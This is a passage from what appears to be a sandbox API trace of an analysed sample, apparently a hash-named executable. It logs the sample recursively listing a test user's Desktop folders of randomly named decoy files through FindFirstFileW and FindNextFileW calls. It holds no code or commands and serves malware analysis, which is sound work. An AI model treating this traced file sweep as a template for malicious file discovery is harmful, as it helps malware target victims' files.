cAlternateFileName="")) returned 0x8fef00 [0256.690] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.691] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.691] FindNextFileW (in: hFindFile=0x8fef00, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.691] FindClose (in: hFindFile=0x8fef00 | out: hFindFile=0x8fef00) returned 1 [0256.691] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.691] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\*", lpFindFileData=0x123a3700 | out: lpFindFileData=0x123a3700*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe940 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe279c310, ftCreationTime.dwHighDateTime=0x1d81b94, ftLastAccessTime.dwLowDateTime=0xa368ce90, ftLastAccessTime.dwHighDateTime=0x1d81c17, ftLastWriteTime.dwLowDateTime=0xa368ce90, ftLastWriteTime.dwHighDateTime=0x1d81c17, nFileSizeHigh=0x0, nFileSizeLow=0x1c32, dwReserved0=0x0, dwReserved1=0x0, cFileName="1TSkQagxs.mp3", cAlternateFileName="1TSKQA~1.MP3")) returned 1 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3d0dea0, ftCreationTime.dwHighDateTime=0x1d81c1d, ftLastAccessTime.dwLowDateTime=0x7ba66ed0, ftLastAccessTime.dwHighDateTime=0x1d81f96, ftLastWriteTime.dwLowDateTime=0x7ba66ed0, ftLastWriteTime.dwHighDateTime=0x1d81f96, nFileSizeHigh=0x0, nFileSizeLow=0xfe9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="6LobOWAB63z9JpnXiRK.m4a", cAlternateFileName="6LOBOW~1.M4A")) returned 1 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31a14790, ftCreationTime.dwHighDateTime=0x1d820f1, ftLastAccessTime.dwLowDateTime=0x25866040, ftLastAccessTime.dwHighDateTime=0x1d82357, ftLastWriteTime.dwLowDateTime=0x25866040, ftLastWriteTime.dwHighDateTime=0x1d82357, nFileSizeHigh=0x0, nFileSizeLow=0xe3fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="7qqVU2GatTMCj 1dpl.mkv", cAlternateFileName="7QQVU2~1.MKV")) returned 1 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3991040, ftCreationTime.dwHighDateTime=0x1d81abf, ftLastAccessTime.dwLowDateTime=0xcc2fc040, ftLastAccessTime.dwHighDateTime=0x1d81e2e, ftLastWriteTime.dwLowDateTime=0xcc2fc040, ftLastWriteTime.dwHighDateTime=0x1d81e2e, nFileSizeHigh=0x0, nFileSizeLow=0x28d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9fTBKDfklFX1UCW.avi", cAlternateFileName="9FTBKD~1.AVI")) returned 1 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x461c5cd0, ftCreationTime.dwHighDateTime=0x1d81ae0, ftLastAccessTime.dwLowDateTime=0x5c99cce0, ftLastAccessTime.dwHighDateTime=0x1d82977, ftLastWriteTime.dwLowDateTime=0x5c99cce0, ftLastWriteTime.dwHighDateTime=0x1d82977, nFileSizeHigh=0x0, nFileSizeLow=0x10f0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="C0ZaBrNA0OtRrZ1pq5.m4a", cAlternateFileName="C0ZABR~1.M4A")) returned 1 [0256.692] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf57ee10, ftCreationTime.dwHighDateTime=0x1d81f5b, ftLastAccessTime.dwLowDateTime=0xb5e23d80, ftLastAccessTime.dwHighDateTime=0x1d81f74, ftLastWriteTime.dwLowDateTime=0xb5e23d80, ftLastWriteTime.dwHighDateTime=0x1d81f74, nFileSizeHigh=0x0, nFileSizeLow=0x1152d, dwReserved0=0x0, dwReserved1=0x0, cFileName="dda kMB.jpg", cAlternateFileName="DDAKMB~1.JPG")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b3975d0, ftCreationTime.dwHighDateTime=0x1d829a0, ftLastAccessTime.dwLowDateTime=0xcbaeb790, ftLastAccessTime.dwHighDateTime=0x1d829ee, ftLastWriteTime.dwLowDateTime=0xcbaeb790, ftLastWriteTime.dwHighDateTime=0x1d829ee, nFileSizeHigh=0x0, nFileSizeLow=0x859e, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWVUXEoQZyD.flv", cAlternateFileName="DWVUXE~1.FLV")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x653be780, ftCreationTime.dwHighDateTime=0x1d83aa1, ftLastAccessTime.dwLowDateTime=0x65d47e00, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0xbe9d1a00, ftLastWriteTime.dwHighDateTime=0x1d83a93, nFileSizeHigh=0x0, nFileSizeLow=0x1f7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe", cAlternateFileName="EC7BAE~1.EXE")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb34aca10, ftCreationTime.dwHighDateTime=0x1d81e11, ftLastAccessTime.dwLowDateTime=0x19da0ce0, ftLastAccessTime.dwHighDateTime=0x1d82115, ftLastWriteTime.dwLowDateTime=0x19da0ce0, ftLastWriteTime.dwHighDateTime=0x1d82115, nFileSizeHigh=0x0, nFileSizeLow=0x16d43, dwReserved0=0x0, dwReserved1=0x0, cFileName="EMZ6NoSJq0-2xx6IW.wav", cAlternateFileName="EMZ6NO~1.WAV")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502071a0, ftCreationTime.dwHighDateTime=0x1d82a0b, ftLastAccessTime.dwLowDateTime=0x6f327050, ftLastAccessTime.dwHighDateTime=0x1d82a26, ftLastWriteTime.dwLowDateTime=0x6f327050, ftLastWriteTime.dwHighDateTime=0x1d82a26, nFileSizeHigh=0x0, nFileSizeLow=0x880, dwReserved0=0x0, dwReserved1=0x0, cFileName="eT_8y6.mp3", cAlternateFileName="")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd57ab50, ftCreationTime.dwHighDateTime=0x1d81f00, ftLastAccessTime.dwLowDateTime=0xd7a8450, ftLastAccessTime.dwHighDateTime=0x1d81fbe, ftLastWriteTime.dwLowDateTime=0xd7a8450, ftLastWriteTime.dwHighDateTime=0x1d81fbe, nFileSizeHigh=0x0, nFileSizeLow=0x17c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="gKB9m3gAI3.mp4", cAlternateFileName="GKB9M3~1.MP4")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa68bd9d0, ftCreationTime.dwHighDateTime=0x1d81fe3, ftLastAccessTime.dwLowDateTime=0xaf4e1fa0, ftLastAccessTime.dwHighDateTime=0x1d82796, ftLastWriteTime.dwLowDateTime=0xaf4e1fa0, ftLastWriteTime.dwHighDateTime=0x1d82796, nFileSizeHigh=0x0, nFileSizeLow=0x115a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IcNKdj QY jIfR5.bmp", cAlternateFileName="ICNKDJ~1.BMP")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a132450, ftCreationTime.dwHighDateTime=0x1d81bc9, ftLastAccessTime.dwLowDateTime=0xebc34260, ftLastAccessTime.dwHighDateTime=0x1d82167, ftLastWriteTime.dwLowDateTime=0xebc34260, ftLastWriteTime.dwHighDateTime=0x1d82167, nFileSizeHigh=0x0, nFileSizeLow=0x172c9, dwReserved0=0x0, dwReserved1=0x0, cFileName="ivion.png", cAlternateFileName="")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d65c720, ftCreationTime.dwHighDateTime=0x1d82629, ftLastAccessTime.dwLowDateTime=0x5b15f2f0, ftLastAccessTime.dwHighDateTime=0x1d829ee, ftLastWriteTime.dwLowDateTime=0x5b15f2f0, ftLastWriteTime.dwHighDateTime=0x1d829ee, nFileSizeHigh=0x0, nFileSizeLow=0x157c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="kY10RHpj1Ccj R.png", cAlternateFileName="KY10RH~1.PNG")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91d69380, ftCreationTime.dwHighDateTime=0x1d8272d, ftLastAccessTime.dwLowDateTime=0x3ca3c120, ftLastAccessTime.dwHighDateTime=0x1d828eb, ftLastWriteTime.dwLowDateTime=0x3ca3c120, ftLastWriteTime.dwHighDateTime=0x1d828eb, nFileSizeHigh=0x0, nFileSizeLow=0x10e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="o7c4LDm2F7lcu2v.wav", cAlternateFileName="O7C4LD~1.WAV")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ef916a0, ftCreationTime.dwHighDateTime=0x1d81af2, ftLastAccessTime.dwLowDateTime=0x3b8b5f50, ftLastAccessTime.dwHighDateTime=0x1d81b21, ftLastWriteTime.dwLowDateTime=0x3b8b5f50, ftLastWriteTime.dwHighDateTime=0x1d81b21, nFileSizeHigh=0x0, nFileSizeLow=0xdd73, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCqRptQW6vY1N.gif", cAlternateFileName="PCQRPT~1.GIF")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc16ded10, ftCreationTime.dwHighDateTime=0x1d82204, ftLastAccessTime.dwLowDateTime=0x50a70580, ftLastAccessTime.dwHighDateTime=0x1d82362, ftLastWriteTime.dwLowDateTime=0x50a70580, ftLastWriteTime.dwHighDateTime=0x1d82362, nFileSizeHigh=0x0, nFileSizeLow=0xe7d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PG2AA8VgUaJQix3.bmp", cAlternateFileName="PG2AA8~1.BMP")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeef1af00, ftCreationTime.dwHighDateTime=0x1d81ff3, ftLastAccessTime.dwLowDateTime=0x891ab940, ftLastAccessTime.dwHighDateTime=0x1d829e1, ftLastWriteTime.dwLowDateTime=0x891ab940, ftLastWriteTime.dwHighDateTime=0x1d829e1, nFileSizeHigh=0x0, nFileSizeLow=0x18678, dwReserved0=0x0, dwReserved1=0x0, cFileName="PNlMo1Rui9-Os7LqiJYf.swf", cAlternateFileName="PNLMO1~1.SWF")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031bb50, ftCreationTime.dwHighDateTime=0x1d82741, ftLastAccessTime.dwLowDateTime=0x95a0a1b0, ftLastAccessTime.dwHighDateTime=0x1d8281b, ftLastWriteTime.dwLowDateTime=0x95a0a1b0, ftLastWriteTime.dwHighDateTime=0x1d8281b, nFileSizeHigh=0x0, nFileSizeLow=0x105da, dwReserved0=0x0, dwReserved1=0x0, cFileName="PuTjWyxTe.mp4", cAlternateFileName="PUTJWY~1.MP4")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530cac90, ftCreationTime.dwHighDateTime=0x1d822ee, ftLastAccessTime.dwLowDateTime=0x3b52540, ftLastAccessTime.dwHighDateTime=0x1d82362, ftLastWriteTime.dwLowDateTime=0x3b52540, ftLastWriteTime.dwHighDateTime=0x1d82362, nFileSizeHigh=0x0, nFileSizeLow=0xbbe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="QnyUe3Ugz.swf", cAlternateFileName="QNYUE3~1.SWF")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6454c00, ftCreationTime.dwHighDateTime=0x1d8225c, ftLastAccessTime.dwLowDateTime=0x632726b0, ftLastAccessTime.dwHighDateTime=0x1d825b8, ftLastWriteTime.dwLowDateTime=0x632726b0, ftLastWriteTime.dwHighDateTime=0x1d825b8, nFileSizeHigh=0x0, nFileSizeLow=0xf54c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SEX0J5RG1Om3TZ.mp4", cAlternateFileName="SEX0J5~1.MP4")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b2b3790, ftCreationTime.dwHighDateTime=0x1d82552, ftLastAccessTime.dwLowDateTime=0xa4008060, ftLastAccessTime.dwHighDateTime=0x1d8296d, ftLastWriteTime.dwLowDateTime=0xa4008060, ftLastWriteTime.dwHighDateTime=0x1d8296d, nFileSizeHigh=0x0, nFileSizeLow=0x1342b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wpUR.mp4", cAlternateFileName="")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x535c8560, ftCreationTime.dwHighDateTime=0x1d8235e, ftLastAccessTime.dwLowDateTime=0x50eda290, ftLastAccessTime.dwHighDateTime=0x1d82990, ftLastWriteTime.dwLowDateTime=0x50eda290, ftLastWriteTime.dwHighDateTime=0x1d82990, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yjUz3WLu", cAlternateFileName="")) returned 1 [0256.693] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x118279b0, ftCreationTime.dwHighDateTime=0x1d825ed, ftLastAccessTime.dwLowDateTime=0x860ae530, ftLastAccessTime.dwHighDateTime=0x1d829b5, ftLastWriteTime.dwLowDateTime=0x860ae530, ftLastWriteTime.dwHighDateTime=0x1d829b5, nFileSizeHigh=0x0, nFileSizeLow=0x9abe, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZH5t5F Pn3U-oGq.mp4", cAlternateFileName="ZH5T5F~1.MP4")) returned 1 [0256.694] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbcbe7f0, ftCreationTime.dwHighDateTime=0x1d8268a, ftLastAccessTime.dwLowDateTime=0xd98c2ce0, ftLastAccessTime.dwHighDateTime=0x1d8277c, ftLastWriteTime.dwLowDateTime=0xd98c2ce0, ftLastWriteTime.dwHighDateTime=0x1d8277c, nFileSizeHigh=0x0, nFileSizeLow=0x78f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="_273Oz.mp3", cAlternateFileName="")) returned 1 [0256.694] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e16ab20, ftCreationTime.dwHighDateTime=0x1d81a1c, ftLastAccessTime.dwLowDateTime=0x45e82fb0, ftLastAccessTime.dwHighDateTime=0x1d8217e, ftLastWriteTime.dwLowDateTime=0x45e82fb0, ftLastWriteTime.dwHighDateTime=0x1d8217e, nFileSizeHigh=0x0, nFileSizeLow=0x11f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="_riLQBNOxB3yhpHCkj.mkv", cAlternateFileName="_RILQB~1.MKV")) returned 1 [0256.694] FindNextFileW (in: hFindFile=0x8fe940, lpFindFileData=0x123a3780 | out: lpFindFileData=0x123a3780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.694] FindClose (in: hFindFile=0x8fe940 | out: hFindFile=0x8fe940) returned 1 [0256.696] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.696] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\*", lpFindFileData=0x123a35f0 | out: lpFindFileData=0x123a35f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x535c8560, ftCreationTime.dwHighDateTime=0x1d8235e, ftLastAccessTime.dwLowDateTime=0x50eda290, ftLastAccessTime.dwHighDateTime=0x1d82990, ftLastWriteTime.dwLowDateTime=0x50eda290, ftLastWriteTime.dwHighDateTime=0x1d82990, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fedc0 [0256.696] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x535c8560, ftCreationTime.dwHighDateTime=0x1d8235e, ftLastAccessTime.dwLowDateTime=0x50eda290, ftLastAccessTime.dwHighDateTime=0x1d82990, ftLastWriteTime.dwLowDateTime=0x50eda290, ftLastWriteTime.dwHighDateTime=0x1d82990, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.696] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbb237930, ftCreationTime.dwHighDateTime=0x1d81bbe, ftLastAccessTime.dwLowDateTime=0x7bac4f30, ftLastAccessTime.dwHighDateTime=0x1d8260d, ftLastWriteTime.dwLowDateTime=0x7bac4f30, ftLastWriteTime.dwHighDateTime=0x1d8260d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="b1s7y96Y6gVCDj", cAlternateFileName="B1S7Y9~1")) returned 1 [0256.696] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ccf620, ftCreationTime.dwHighDateTime=0x1d82620, ftLastAccessTime.dwLowDateTime=0x58140b70, ftLastAccessTime.dwHighDateTime=0x1d8286b, ftLastWriteTime.dwLowDateTime=0x58140b70, ftLastWriteTime.dwHighDateTime=0x1d8286b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bHSVytOE", cAlternateFileName="")) returned 1 [0256.696] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaf22aa0, ftCreationTime.dwHighDateTime=0x1d8239a, ftLastAccessTime.dwLowDateTime=0x55cc82e0, ftLastAccessTime.dwHighDateTime=0x1d8285f, ftLastWriteTime.dwLowDateTime=0x55cc82e0, ftLastWriteTime.dwHighDateTime=0x1d8285f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="u5XgcDVp", cAlternateFileName="")) returned 1 [0256.696] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8970200, ftCreationTime.dwHighDateTime=0x1d81afa, ftLastAccessTime.dwLowDateTime=0x6b4aa820, ftLastAccessTime.dwHighDateTime=0x1d82910, ftLastWriteTime.dwLowDateTime=0x6b4aa820, ftLastWriteTime.dwHighDateTime=0x1d82910, nFileSizeHigh=0x0, nFileSizeLow=0xe90f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZA606Y.rtf", cAlternateFileName="")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fedc0, lpFindFileData=0x123a3670 | out: lpFindFileData=0x123a3670*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.697] FindClose (in: hFindFile=0x8fedc0 | out: hFindFile=0x8fedc0) returned 1 [0256.697] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.697] FindFirstFileW (in: lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\*", lpFindFileData=0x123a34e0 | out: lpFindFileData=0x123a34e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbb237930, ftCreationTime.dwHighDateTime=0x1d81bbe, ftLastAccessTime.dwLowDateTime=0x7bac4f30, ftLastAccessTime.dwHighDateTime=0x1d8260d, ftLastWriteTime.dwLowDateTime=0x7bac4f30, ftLastWriteTime.dwHighDateTime=0x1d8260d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe900 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbb237930, ftCreationTime.dwHighDateTime=0x1d81bbe, ftLastAccessTime.dwLowDateTime=0x7bac4f30, ftLastAccessTime.dwHighDateTime=0x1d8260d, ftLastWriteTime.dwLowDateTime=0x7bac4f30, ftLastWriteTime.dwHighDateTime=0x1d8260d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6200de0, ftCreationTime.dwHighDateTime=0x1d82848, ftLastAccessTime.dwLowDateTime=0x7ea1d980, ftLastAccessTime.dwHighDateTime=0x1d82923, ftLastWriteTime.dwLowDateTime=0x7ea1d980, ftLastWriteTime.dwHighDateTime=0x1d82923, nFileSizeHigh=0x0, nFileSizeLow=0x16ed3, dwReserved0=0x0, dwReserved1=0x0, cFileName="0C0imTxCn.mp3", cAlternateFileName="0C0IMT~1.MP3")) returned 1 [0256.697] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3560 | out: lpFindFileData=0x123a3560*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac66d30, ftCreationTime.dwHighDateTime=0x1d81f84, ftLastAccessTime.dwLowDateTime=0xe86fb5a0, ftLastAccessTime.dwHighDateTime=0x1d8229b, ftLastWriteTime.dwLowDateTime=0xe86fb5a0, 